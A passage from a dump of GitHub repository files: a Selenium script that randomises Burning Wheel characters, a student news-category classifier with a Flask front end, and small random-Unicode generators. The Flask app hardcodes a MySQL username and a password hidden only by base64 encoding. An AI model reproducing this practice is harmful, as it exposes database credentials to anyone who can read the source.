ThisFirst.getDate(); //ThisFirst의 일수를 구한다.\nvar TFDay = ThisFirst.getDay(); //ThisFirst의 요일을 구한다.\n\nvar TLDate = ThisLast.getDate(); //ThisLast의 일수를 구한다.\nvar TLDay = ThisLast.getDay(); //ThisLast의 요일을 구한다.\n\nvar PFDate = PrevFirst.getDate(); //PrevFirst의 일수를 구한다.\nvar PFDay = PrevFirst.getDay(); //PrevFirst의 요일을 구한다.\n\nvar PLDate = PrevLast.getDate(); //PrevLast의 일수를 구한다.\nvar PLDay = PrevLast.getDay(); //PrevLast의 요일을 구한다.\n\nvar NFDate = NextFirst.getDate(); //PrevLast의 일수를 구한다.\nvar NFDay = NextFirst.getDay(); //PrevLast의 요일을 구한다.\n\nvar NLDate = NextLast.getDate(); //PrevLast의 일수를 구한다.\nvar NLDay = NextLast.getDay(); //PrevLast의 요일을 구한다.\n\n// Evenset 함수 정의 시작\n// Evenset 함수 정의 시작\n// Evenset 함수 정의 시작\n// Evenset 함수 정의 시작\n// Evenset 함수 정의 시작\n" } ]
11
spoonpaw/burning-wheel-random-character-generator
https://github.com/spoonpaw/burning-wheel-random-character-generator
d3ed033295702c0fedb55b4aa0b24edab875f44d
acf897ee0e9cd2582b1d800a23af4e4cf0b79a69
5caad67d17671bca97d04b0990ffa3691b4ee363
refs/heads/master
2022-12-09T02:17:57.596830
2020-09-05T01:41:59
2020-09-05T01:41:59
292,788,037
3
1
null
null
null
null
null
[ { "alpha_fraction": 0.49733081459999084, "alphanum_fraction": 0.5062019228935242, "avg_line_length": 42.17966079711914, "blob_id": "dc7dd7c777d89626aa3451e75d8a975c302e17df", "content_id": "4b7c71d8bc1a56d13d295813d2385e1adb48274e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12738, "license_type": "no_license", "max_line_length": 121, "num_lines": 295, "path": "/charredBlackRandomizer.py", "repo_name": "spoonpaw/burning-wheel-random-character-generator", "src_encoding": "UTF-8", "text": "from webdriver_manager.chrome import ChromeDriverManager\nimport pyinputplus as pyip\nimport sys\nfrom selenium import webdriver\nimport time\nimport random\nimport pyautogui\nfrom selenium.common.exceptions import ElementClickInterceptedException\nfrom selenium.webdriver.support.select import Select\n\ncontinueRun = True\n\nwhile continueRun:\n try:\n if raceChoice is not None:\n pass\n else:\n raceChoice = None\n except NameError:\n pass\n try:\n if lifePathNum is not None:\n pass\n else:\n lifePathNum = None\n except NameError:\n pass\n try:\n if genderNum is not None:\n pass\n else:\n genderNum = None\n except NameError:\n pass\n try:\n if lifePathNumber is not None:\n pass\n else:\n lifePathNumber = None\n except NameError:\n pass\n editMode = True\n while editMode:\n print('select a parameter to edit')\n print('1 - race')\n print('2 - number of lifepaths')\n print('3 - gender')\n print('4 - generate')\n print('5 - parameters so far')\n print('0 - exit')\n editChoiceInputNumber = pyip.inputNum()\n if editChoiceInputNumber < 0 or editChoiceInputNumber > 5:\n print('please enter a number between 1 and 5')\n continue\n elif editChoiceInputNumber == 0:\n sys.exit()\n elif editChoiceInputNumber == 1:\n raceEditMode = True\n while raceEditMode:\n print('select a race')\n print('1 - man')\n print('2 - dwarf')\n print('3 - elf')\n print('4 - orc')\n print('5 - roden')\n print('6 - great wolf')\n print('7 - troll')\n print('0 - exit')\n raceChoice = pyip.inputNum()\n if raceChoice < 0 or raceChoice > 7:\n print('please enter a number between 1 and 7')\n continue\n elif raceChoice == 0:\n sys.exit()\n elif raceChoice == 1:\n print('man chosen. would you like to make further adjustments? (y/n)')\n raceName = 'man'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n elif raceChoice == 2:\n print('dwarf chosen. would you like to make further adjustments? (y/n)')\n raceName = 'dwarf'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n elif raceChoice == 3:\n print('elf chosen. would you like to make further adjustments? (y/n)')\n raceName = 'elf'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n elif raceChoice == 4:\n print('orc chosen. would you like to make further adjustments? (y/n)')\n raceName = 'orc'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n elif raceChoice == 5:\n print('roden chosen. would you like to make further adjustments? (y/n)')\n raceName = 'roden'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n elif raceChoice == 6:\n print('great wolf chosen. would you like to make further adjustments? (y/n)')\n raceName = 'great wolf'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n elif raceChoice == 7:\n print('troll chosen. would you like to make further adjustments? (y/n)')\n raceName = 'troll'\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n raceEditMode = False\n else:\n raceEditMode = False\n editMode = False\n\n elif editChoiceInputNumber == 2:\n lifePathEditMode = True\n while lifePathEditMode:\n print('please enter the number of lifepaths you wish for your character to have')\n lifePathNumber = pyip.inputNum()\n if lifePathNumber <= 0:\n print('please enter a positive integer')\n continue\n print(f'{lifePathNumber} lifepaths chosen. would you like to make further adjustments? (y/n)')\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n lifePathEditMode = False\n else:\n lifePathEditMode = False\n editMode = False\n elif editChoiceInputNumber == 3:\n genderPathEditMode = True\n while genderPathEditMode:\n print('please pick a gender.')\n print('1 - female')\n print('2 - male')\n genderNum = pyip.inputNum()\n if genderNum < 1 or genderNum > 2:\n print('please enter 1 or 2')\n continue\n if genderNum == 1:\n genderName = 'female'\n print(\"you've chosen female. would you like to make further adjustments? (y/n)\")\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n genderPathEditMode = False\n else:\n genderPathEditMode = False\n editMode = False\n if genderNum == 2:\n genderName = 'male'\n print(\"you've chosen male. would you like to make further adjustments? (y/n)\")\n backToMenuAnswer = pyip.inputYesNo()\n if backToMenuAnswer == 'yes':\n genderPathEditMode = False\n else:\n genderPathEditMode = False\n editMode = False\n\n elif editChoiceInputNumber == 5:\n print(f'race = {raceName}')\n print(f'number of lifepaths = {lifePathNumber}')\n print(f'gender = {genderName}')\n print('press enter to continue')\n input()\n elif editChoiceInputNumber == 4:\n editMode = False\n break\n generateMode = True\n while generateMode is True:\n driver = webdriver.Chrome(ChromeDriverManager().install())\n driver.implicitly_wait(3)\n driver.get('http://charred-black.herokuapp.com/#/')\n raceSelector = driver.find_element_by_css_selector('#collapse_first > div > div > div > div:nth-child(5) > '\n 'select')\n try:\n if raceChoice is None:\n raceNumber = random.randint(1, 7)\n else:\n raceNumber = raceChoice\n except NameError:\n raceNumber = random.randint(1, 7)\n print(f'raceNumber = {raceNumber}')\n raceSelector2 = Select(driver.find_element_by_xpath('//*[@id=\"collapse_first\"]/div/div/div/div[5]/select'))\n if raceNumber == 1:\n raceSelector2.select_by_value('man')\n elif raceNumber == 2:\n raceSelector2.select_by_value('dwarf')\n elif raceNumber == 3:\n raceSelector2.select_by_value('elf')\n elif raceNumber == 4:\n raceSelector2.select_by_value('orc')\n elif raceNumber == 5:\n raceSelector2.select_by_value('roden')\n elif raceNumber == 6:\n raceSelector2.select_by_value('wolf')\n elif raceNumber == 7:\n raceSelector2.select_by_value('troll')\n genderSelector = driver.find_element_by_css_selector('#collapse_first > div > div > div > div:nth-child(8) > '\n 'select')\n try:\n if genderNum is None:\n genderNumber = random.randint(1, 2)\n else:\n genderNumber = genderNum\n except NameError:\n genderNumber = random.randint(1, 2)\n print(f'genderNumber = {genderNumber}')\n if genderNumber > 1:\n genderSelector2 = Select(driver.find_element_by_xpath('//*[@id=\"collapse_first\"]/div/div/div/div[8]/select'))\n genderSelector2.select_by_value('male')\n else:\n pass\n try:\n if lifePathNumber is None:\n lifePathQuantity = random.randint(4, 6)\n else:\n lifePathQuantity = lifePathNumber\n except NameError:\n lifePathQuantity = random.randint(4, 6)\n print(f'lifepath quantity = {lifePathQuantity}')\n for i in range(0, lifePathQuantity):\n settingSelector = driver.find_element_by_xpath('''//*[@id=\"collapse_lp\"]/div/div[2]/div[1]/div[1]/select''')\n allSettings = settingSelector.find_elements_by_tag_name(\"option\")\n print(f'number of settings available = {len(allSettings)}')\n settingNum = random.randint(1, len(allSettings))\n print(f'settingNum = {settingNum}')\n setting = Select(driver.find_element_by_xpath('''//*[@id=\"collapse_lp\"]/div/div[2]/div[1]/div[1]/select'''))\n setting.select_by_value(str(settingNum - 1))\n lifePathSelector = driver.find_element_by_xpath(\n '''//*[@id=\"collapse_lp\"]/div/div[2]/div[1]/div[2]/select''')\n allLifepaths = lifePathSelector.find_elements_by_tag_name(\"option\")\n print(f'number of lifepaths available = {len(allLifepaths)}')\n lifePathNum = random.randint(1, len(allLifepaths))\n print(f'lifePathNum = {lifePathNum}')\n lifepath = Select(\n driver.find_element_by_xpath('''//*[@id=\"collapse_lp\"]/div/div[2]/div[1]/div[2]/select'''))\n lifepath.select_by_value(str(lifePathNum - 1))\n addLifePathButton = driver.find_element_by_css_selector(\n '#collapse_lp > div > div.container > div:nth-child(1) > div.col-md-1 > a')\n try:\n addLifePathButton.click()\n except ElementClickInterceptedException:\n for m in range(0, 15):\n pyautogui.press('tab')\n pyautogui.press('enter')\n addLifePathButton.click()\n # collapse_lp > div > div.container > div:nth-child(1) > div:nth-child(1) > select\n\n # count = len(Select(settingSelector).options)\n # print(count)\n driver.find_element_by_css_selector('#collapse_stats > div > div > div:nth-child(3) > div > button').click()\n characterFinished = True\n while characterFinished == True:\n print('character complete. do you want to make a new character?')\n print('1 - yes, use the same parameters')\n print('2 - no, please start over from the beginning')\n finishedCharacterInput = pyip.inputNum()\n if finishedCharacterInput < 1 or finishedCharacterInput > 2:\n print('please enter 1 or 2')\n continue\n elif finishedCharacterInput == 2:\n raceChoice = None\n lifePathNum = None\n genderNum = None\n lifePathNumber = None\n characterFinished = False\n generateMode = False\n break\n elif finishedCharacterInput == 1:\n characterFinished = False\n break\n" }, { "alpha_fraction": 0.8218181729316711, "alphanum_fraction": 0.8254545331001282, "avg_line_length": 29.55555534362793, "blob_id": "c4eec347f774a7f97aaf503cf4ac69af505ca3b3", "content_id": "ce945eae3796cb153f9ce2d670e80e413911da40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 275, "license_type": "no_license", "max_line_length": 103, "num_lines": 9, "path": "/README.md", "repo_name": "spoonpaw/burning-wheel-random-character-generator", "src_encoding": "UTF-8", "text": "# burning-wheel-random-character-generator\nthis script will open the charred black burning wheel character creator and generate a random character\n\nit needs python 3 to run\nit also requires a few modules that can be installed with pip:\n\npyinputplus\nselenium\nimport pyautogui\n" } ]
2
agammsantos/Final-Project-JCDS
https://github.com/agammsantos/Final-Project-JCDS
7a6860f73fd5173d62cdf2658d48a86d7e616cb3
72aecec416b81588325770ccbe073c2011f2e65d
a84d659e4e24e61554ef881ed92ed7744413d2d3
refs/heads/master
2022-02-05T11:47:01.097422
2019-07-23T00:14:40
2019-07-23T00:14:40
198,082,489
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7593201994895935, "alphanum_fraction": 0.7727521657943726, "avg_line_length": 66.5740737915039, "blob_id": "6614ace1058ee1f59cd89fee7fcc9bffcc2963e4", "content_id": "5063c28870ebc22c302b1b57cdaca70f09bcc571", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3653, "license_type": "no_license", "max_line_length": 638, "num_lines": 54, "path": "/readme.md", "repo_name": "agammsantos/Final-Project-JCDS", "src_encoding": "UTF-8", "text": "![purwadhikaLogo](https://d1ah56qj523gwb.cloudfront.net/uploads/organizations/logos/1538557444-kcgv11HXelvcOnlyrGcEpfwAf6hbPMhC.png)\n\n# News Category Predictor - Purwadhika Job Connector Data Science Batch 04 Final Project\n\nNews are the window of the world. They keep us updated on what's happening around us every day. With how the stream of news are going around nowadays, some category of news might interest us, while others might not. Of course, in order to save time, you probably want to know what kind of news you are about to read, though i myself doubt that. But in case you do, News Category Predictor can help you on trying to figure out which category does the news belong to by analyzing its headline and short description. Further applications such as filtering news with a web-scrapping program and recommendations by category are possible feats.\n\n**This simple project is made to show a prediction of news category and serve it along with confidence statement as well as probability plot**\n\nThis project falls into the topic of classification with machine learning model.\nThe dataset used for model training is obtainable from [kaggle.com](https://www.kaggle.com/rmisra/news-category-dataset).\n3 machine learning models were used and compared through, they are: \n\n1. Multinomial Naive Bayes Method\n2. Complement Naive Bayes Method\n3. Stochastic Gradient Descent Method\n\nAfter comparing the three models, Complement Naive Bayes Method was chosen to be the one processing all the news data up until the prediction on the front-end interface which was made with the help of [Flask](https://palletsprojects.com/p/flask/) and other miscellaneous things.\n\nAs the preparation, the dataset were all analyzed, cleaned, and plotted with the help of [Pandas](https://pandas.pydata.org/) and [Matplotlib](https://matplotlib.org/). The model were dumped using joblib by *newsmodel.py*. Further on, the barplot which is available on the prediction page were made by utilizing [Seaborn](https://seaborn.pydata.org/)\n\nHere is the collection of Histograms which were being plot by *newsplot.py*:\n![Histo1](./histogramh.png)\n![Histo2](./histogramd.png)\n![Histo3](./histogramf.png)\n\n**How to run the Web App**\n1. Clone/download this repo.\n2. Open *newsflask.py*.\n3. To include the data export to MySQL, make sure you have the same account profile and database, or just delete lines that have to do with MySQL syntax.\n4. Run *newsflask.py*.\n5. The server will run on localhost:5000 which bring you to the homepage:\n ![Home](./home.png)\n This page serves as the landing page with a few navigation buttons such as:\n - News Category Predictor: Takes you to the same page.\n - Categories / List of Categories: Scroll the page down to categories section which tell you categories available for predicting.\n - Start Predicting: Scroll the page down to predicting section, which is the main feature of the project.\n\n Categories:\n ![Categories1](./cat1.png)\n ![Categories2](./cat2.png)\n\n Start Prediction:\n ![Start](./start.png)\n\n6. After you fill the required features, click on the Predict Category, it will bring you to the prediction result page with a Back button:\n ![Result](./prediction.png)\n Note that the news headline and description used for this result were taken from [60secondsnow.com](https://www.60secondsnow.com/).\n\nMySQL was used only to store prediction data which the user has input through homepage on Predicting Category. *404 Error* also included on the template.\n\n___\n### I really hope this project could be any of use to you. Corrections and further applications are very welcome 😊\n\n#### ✉ [email protected]_" }, { "alpha_fraction": 0.7240291237831116, "alphanum_fraction": 0.7271844744682312, "avg_line_length": 44.27472686767578, "blob_id": "e6079cf0c51267af71f1548792aa33caedd4ec88", "content_id": "3cc3764b0f220af6076a18b29b0d163ef73e0050", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4120, "license_type": "no_license", "max_line_length": 127, "num_lines": 91, "path": "/newsmodel.py", "repo_name": "agammsantos/Final-Project-JCDS", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.naive_bayes import ComplementNB\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport joblib as jb\n\n\ndata=pd.read_json('News_Category_Dataset_v2.json',lines=True)\n# print(data[data['headline'].isnull()==True])\n# print(data[data['short_description'].isnull()==True])\n# print(data.columns.values)\n# print(data['category'].value_counts())\n\ndata.category = data.category.map(lambda x: \"ARTS & CULTURE\" if x == \"ARTS\" or x == \"CULTURE & ARTS\" else x)\ndata.category = data.category.map(lambda x: \"WEIRD NEWS & COMEDY\" if x == \"COMEDY\" or x == \"WEIRD NEWS\" else x)\ndata.category = data.category.map(lambda x: \"BUSINESS\" if x == \"MONEY\" else x)\ndata.category = data.category.map(lambda x: \"EDUCATION\" if x == \"COLLEGE\" else x)\ndata.category = data.category.map(lambda x: \"HOME & LIVING\" if x == \"HEALTHY LIVING\" or x == \"WELLNESS\" or x == \"FIFTY\" else x)\ndata.category = data.category.map(lambda x: \"PARENTS\" if x == \"PARENTING\" else x)\ndata.category = data.category.map(lambda x: \"IMPACT\" if x == \"GOOD NEWS\" else x)\ndata.category = data.category.map(lambda x: \"ENVIRONMENT\" if x == \"GREEN\" else x)\ndata.category = data.category.map(lambda x: \"STYLE & BEAUTY\" if x == \"STYLE\" else x)\ndata.category = data.category.map(lambda x: \"FOOD & DRINK\" if x == \"TASTE\" else x)\ndata.category = data.category.map(lambda x: \"SCIENCE & TECH\" if x == \"SCIENCE\" or x == \"TECH\" else x)\ndata.category = data.category.map(lambda x: \"WORLD NEWS\" if x == \"THE WORLDPOST\" or x == \"WORLDPOST\" else x)\nprint(data['category'].value_counts())\n# print(data['features'][data['category']=='COMEDY'])\n# print(data['features'][data['category']=='WEIRD NEWS'])\n# data=data.drop(data[data['category']=='GOOD NEWS'].index.values)\n# data=data.drop(data[data['category']=='IMPACT'].index.values)\n\ndata['features']=data['headline']+' '+data['short_description']\ndata['features']=data['features'].apply(lambda x: x.lower())\ndata['hwlen'] = data['headline'].apply(lambda x: x.split(' ')).apply(len)\ndata['dwlen'] = data['short_description'].apply(lambda x: x.split(' ')).apply(len)\ndata['fwlen'] = data['features'].apply(lambda x: x.split(' ')).apply(len)\ndata.to_csv(r'news.csv')\n# print(data['features'].head())\n# print(data['fwlen'].max())\n\n\nx = data['features']\ny = data['category']\nxtr, xts, ytr, yts = train_test_split(x, y, test_size=.05, random_state=42)\n\nmultinomialPipeline = Pipeline([\n ('cv',CountVectorizer(stop_words='english')),\n ('classifier',MultinomialNB())\n])\nmultinomialPipeline.fit(xtr,ytr)\nmultinomialPrediksi = multinomialPipeline.predict(xts)\n\ncomplementPipeline = Pipeline([\n ('cv',CountVectorizer(stop_words='english')),\n ('classifier',ComplementNB())\n])\ncomplementPipeline.fit(xtr,ytr)\ncomplementPrediksi = complementPipeline.predict(xts)\n\nsgdcPipeline = Pipeline([\n ('cv',CountVectorizer(stop_words='english')),\n ('classifier',SGDClassifier(loss='hinge', penalty='l2',alpha=1e-3, random_state=42, max_iter=5, tol=1e-3))\n])\nsgdcPipeline.fit(xtr,ytr)\nsgdcPrediksi = sgdcPipeline.predict(xts)\n\nprint('Dengan metode MultinomialNB, diperoleh: ')\nprint(classification_report(yts,multinomialPrediksi))\nprint(confusion_matrix(yts,multinomialPrediksi))\nprint('\\n')\nprint('Dengan metode ComplementNB, diperoleh: ')\nprint(classification_report(yts,complementPrediksi))\nprint(confusion_matrix(yts,complementPrediksi))\nprint('\\n')\nprint('Dengan metode Stochastic Gradient Descent, diperoleh: ')\nprint(classification_report(yts,sgdcPrediksi))\nprint(confusion_matrix(yts,sgdcPrediksi))\n\nhead = \"Tiger Woods misses Open cut, yearns for 'hot weeks'\"\ndesc = 'Tiger Woods missed the cut in the Open Championship at Royal Portrush'\nfeat = head+' '+desc\nprint(complementPipeline.predict([feat]))\nprint(complementPipeline.predict_proba([feat]))\nprint(complementPipeline.score(xtr,ytr))\n\njb.dump(complementPipeline, 'modelComplement')\n" }, { "alpha_fraction": 0.6500852704048157, "alphanum_fraction": 0.6722569465637207, "avg_line_length": 34.189998626708984, "blob_id": "be89c03734b00e698e827cb14de2916564d89c1e", "content_id": "a0cd90206691a4b3df10aee8459341018e6a93fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3518, "license_type": "no_license", "max_line_length": 148, "num_lines": 100, "path": "/newsflask.py", "repo_name": "agammsantos/Final-Project-JCDS", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nfrom flask import Flask, render_template, request\nfrom flask_mysqldb import MySQL \nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport base64\nimport io\nimport joblib as jb\n\napp=Flask(__name__,static_url_path='/static')\nmysql=MySQL(app)\n\napp.config['MYSQL_HOST']='localhost'\napp.config['MYSQL_USER']='agammsantos'\napp.config['MYSQL_PASSWORD']=base64.b64decode(b\"RGFuY2VyMTE5OQ==\").decode('utf-8')\napp.config['MYSQL_DB']='news'\n\[email protected]('/')\ndef home():\n return render_template('land.htm')\n\[email protected]('/prediksi', methods=['POST'])\ndef predict():\n head=str(request.form['head']).lower()\n desc=str(request.form['desc']).lower()\n feature=head+' '+desc\n \n prediksi=model.predict([feature])[0]\n prediksi_l=prediksi.lower().split(' ')\n prediksi_u=[]\n for i in prediksi_l:\n prediksi_u.append(i[0].upper()+i[1:])\n kategori=' '.join(prediksi_u)\n \n probabilitas=model.predict_proba([feature])\n enumprob=list(enumerate(probabilitas[0]))\n enumprob.sort(key=lambda x:x[1],reverse=True)\n probutama=enumprob[:5]\n\n df=pd.read_csv('news.csv')\n sortedlist=df['category'].unique()\n sortedlist.sort()\n \n plotkategori=[]\n plotprob=[]\n for i in probutama:\n plotkategori.append(sortedlist[i[0]])\n plotprob.append(i[1]*100)\n\n plt.close()\n sns.set(style=\"darkgrid\")\n sns.set_context(\"talk\")\n ax=sns.barplot(plotprob,plotkategori,palette=\"Blues_d\")\n ax.set(xlabel='Probability (%)',ylabel='')\n plotlist=[(plotprob[i],plotkategori[i]) for i in range(0,len(plotprob))]\n xticks=np.arange(0,101,20)\n index=0\n for a,b in plotlist:\n ax.text(a+13.5,index+0.1,str(round(a,2))+'%',color='black',ha=\"center\")\n index+=1\n ax.set_xticks(xticks)\n plt.tight_layout()\n fig=ax.get_figure()\n \n img=io.BytesIO()\n fig.savefig(img,format='png',transparent=True)\n img.seek(0)\n graph_url=base64.b64encode(img.getvalue()).decode()\n graph='data:image/png;base64,{}'.format(graph_url)\n\n if (plotprob[0]-plotprob[1])<5 and (plotprob[1]-plotprob[2])<5 and (plotprob[2]-plotprob[3])<5 and (plotprob[3]-plotprob[4])<5:\n statement=\"We must say this one is too hard to predict. The words are just too random. Here's the visualization for you: \"\n elif (plotprob[0]-plotprob[1])<5 and (plotprob[1]-plotprob[2])<5:\n statement=\"Though it seems we're likely wrong about the prediction. Worry not, we have the tendencies for you: \"\n elif (plotprob[0]-plotprob[1])<5:\n statement=\"We kind of doubt this prediction result ourselves, But it's basically one or another it seems: \"\n elif 5<=(plotprob[0]-plotprob[1])<10:\n statement=\"We are on the stance of confidence right here about the prediction. In case we're wrong, we have the probabilities: \"\n elif (plotprob[0]-plotprob[1])>=10:\n statement=\"We are pretty sure about this prediction. Here's why: \"\n\n x=mysql.connection.cursor()\n x.execute('insert into news (headline,description,prediction) values (%s,%s,%s)',(str(request.form['head']),str(request.form['desc']),kategori))\n mysql.connection.commit()\n\n predictData=[kategori,statement,graph]\n return render_template('predict.htm',prediction=predictData)\n\[email protected]('/NotFound')\ndef notFound():\n return render_template('error.htm')\n\[email protected](404)\ndef notFound404(error):\n return render_template('error.htm')\n\nif __name__=='__main__':\n model=jb.load('modelComplement')\n app.run(debug=True)" }, { "alpha_fraction": 0.6704155206680298, "alphanum_fraction": 0.6847860217094421, "avg_line_length": 41.68000030517578, "blob_id": "bb76163209492a1945d9bb368d7b76eeaf13824e", "content_id": "adfab30fe2ca68c0676c100841ad024a9e5536db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3201, "license_type": "no_license", "max_line_length": 127, "num_lines": 75, "path": "/newsplot.py", "repo_name": "agammsantos/Final-Project-JCDS", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndata=pd.read_json('News_Category_Dataset_v2.json',lines=True)\nprint(data[data['headline'].isnull()==True])\nprint(data[data['short_description'].isnull()==True])\n# print(data.columns.values)\n# print(data['category'].value_counts())\n\ndata.category = data.category.map(lambda x: \"ARTS & CULTURE\" if x == \"ARTS\" or x == \"CULTURE & ARTS\" else x)\ndata.category = data.category.map(lambda x: \"WEIRD NEWS & COMEDY\" if x == \"COMEDY\" or x == \"WEIRD NEWS\" else x)\ndata.category = data.category.map(lambda x: \"BUSINESS\" if x == \"MONEY\" else x)\ndata.category = data.category.map(lambda x: \"EDUCATION\" if x == \"COLLEGE\" else x)\ndata.category = data.category.map(lambda x: \"HOME & LIVING\" if x == \"HEALTHY LIVING\" or x == \"WELLNESS\" or x == \"FIFTY\" else x)\ndata.category = data.category.map(lambda x: \"PARENTS\" if x == \"PARENTING\" else x)\ndata.category = data.category.map(lambda x: \"IMPACT\" if x == \"GOOD NEWS\" else x)\ndata.category = data.category.map(lambda x: \"ENVIRONMENT\" if x == \"GREEN\" else x)\ndata.category = data.category.map(lambda x: \"STYLE & BEAUTY\" if x == \"STYLE\" else x)\ndata.category = data.category.map(lambda x: \"FOOD & DRINK\" if x == \"TASTE\" else x)\ndata.category = data.category.map(lambda x: \"SCIENCE & TECH\" if x == \"SCIENCE\" or x == \"TECH\" else x)\ndata.category = data.category.map(lambda x: \"WORLD NEWS\" if x == \"THE WORLDPOST\" or x == \"WORLDPOST\" else x)\n# print(data['features'][data['category']=='COMEDY'])\n# print(data['features'][data['category']=='WEIRD NEWS'])\n# data=data.drop(data[data['category']=='GOOD NEWS'].index.values)\n# data=data.drop(data[data['category']=='IMPACT'].index.values)\n\ndata['features']=data['headline']+' '+data['short_description']\ndata['features']=data['features'].apply(lambda x: x.lower())\ndata['hwlen'] = data['headline'].apply(lambda x: x.split(' ')).apply(len)\ndata['dwlen'] = data['short_description'].apply(lambda x: x.split(' ')).apply(len)\ndata['fwlen'] = data['features'].apply(lambda x: x.split(' ')).apply(len)\n# print(data['features'].head())\n# print(data['fwlen'].max())\n\n\ngrouped=data.groupby('category')\nprint(grouped.ngroups)\nprint(grouped.describe())\n\nplt.figure('Histogram 1',figsize=(25,25))\nplt.suptitle('Histogram Jumlah Kata Headline Per Kategori',size=25)\ni=1\nfor group in grouped:\n plt.subplot(5,5,i)\n plt.title(group[0])\n plt.hist(group[1]['hwlen'],bins='auto')\n i+=1 \nplt.subplots_adjust(hspace=.6,wspace=.4)\nplt.savefig('./histogramh.png',format='png')\n\nplt.figure('Histogram 2',figsize=(25,25))\nplt.suptitle('Histogram Jumlah Kata Deskripsi Per Kategori',size=25)\ni=1\nfor group in grouped:\n plt.subplot(5,5,i)\n plt.title(group[0])\n plt.hist(group[1]['dwlen'],bins='auto')\n i+=1 \nplt.subplots_adjust(hspace=.6,wspace=.4)\nplt.savefig('./histogramd.png',format='png')\n\nplt.figure('Histogram 3',figsize=(25,25))\nplt.suptitle('Histogram Jumlah Kata Features Per Kategori',size=25)\ni=1\nfor group in grouped:\n plt.subplot(5,5,i)\n plt.title(group[0])\n plt.hist(group[1]['fwlen'],bins='auto')\n i+=1 \nplt.subplots_adjust(hspace=.6,wspace=.4)\nplt.savefig('./histogramf.png',format='png')\n\nplt.show()\n" } ]
4
logs3/random_utf8
https://github.com/logs3/random_utf8
8bea68036a4bc08711a4e811aaee251ff827627e
86c1bf8c8868db74c14ada1018bdc7cefb00898e
1cb88d3980c7c1beb728bb8cf389f112a32ffd72
refs/heads/master
2022-12-04T00:05:15.790749
2020-08-22T19:12:14
2020-08-22T19:12:14
263,857,433
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.668639063835144, "alphanum_fraction": 0.7100591659545898, "avg_line_length": 32.79999923706055, "blob_id": "f7b8351862197bcbd16035cadad6e52fc14d6fe0", "content_id": "78992f846adf681540fc5df0a79a9bce404edf5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 169, "license_type": "no_license", "max_line_length": 88, "num_lines": 5, "path": "/chinese.py", "repo_name": "logs3/random_utf8", "src_encoding": "UTF-8", "text": "import random\n\ndef random_chinese(length):\n random_unicodes = [chr(random.randrange(0x4E00, 0x9FBF)) for _ in range(0, length)] \n return u\"\".join(random_unicodes)\n" }, { "alpha_fraction": 0.6608186960220337, "alphanum_fraction": 0.719298243522644, "avg_line_length": 33.20000076293945, "blob_id": "2c07a0f96d349e756bb840e8c66bbf35c57662a5", "content_id": "43c1ac828bd54d64fb8ea9ce6a76cb439c5fece4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 171, "license_type": "no_license", "max_line_length": 89, "num_lines": 5, "path": "/emoji/emoticon.py", "repo_name": "logs3/random_utf8", "src_encoding": "UTF-8", "text": "import random\n\ndef random_emoticon(length):\n random_unicodes = [chr(random.randrange(0x1F601, 0x1F64F)) for _ in range(0, length)]\n return u\"\".join(random_unicodes)\n" }, { "alpha_fraction": 0.6627218723297119, "alphanum_fraction": 0.7218934893608093, "avg_line_length": 33, "blob_id": "d4dfcb82297bf36e7c2fcd19aa0ea94788dbfd52", "content_id": "a3e45c9197acc60afd99fff1c52b69653ec7f77f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 169, "license_type": "no_license", "max_line_length": 89, "num_lines": 5, "path": "/emoji/symbols.py", "repo_name": "logs3/random_utf8", "src_encoding": "UTF-8", "text": "import random\n\ndef random_symbols(length):\n random_unicodes = [chr(random.randrange(0x1F680, 0x1F6C0)) for _ in range(0, length)]\n return u\"\".join(random_unicodes)" }, { "alpha_fraction": 0.6566265225410461, "alphanum_fraction": 0.7108433842658997, "avg_line_length": 32.20000076293945, "blob_id": "dafeaaab1d839c86416f10607e9f9d57c820cad9", "content_id": "4c8aabedf4dedb80ffd8398e94536953d4f898ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 166, "license_type": "no_license", "max_line_length": 87, "num_lines": 5, "path": "/error.py", "repo_name": "logs3/random_utf8", "src_encoding": "UTF-8", "text": "import random\n\ndef random_error(length):\n random_unicodes = [chr(random.randrange(0x1041, 0x10aa)) for 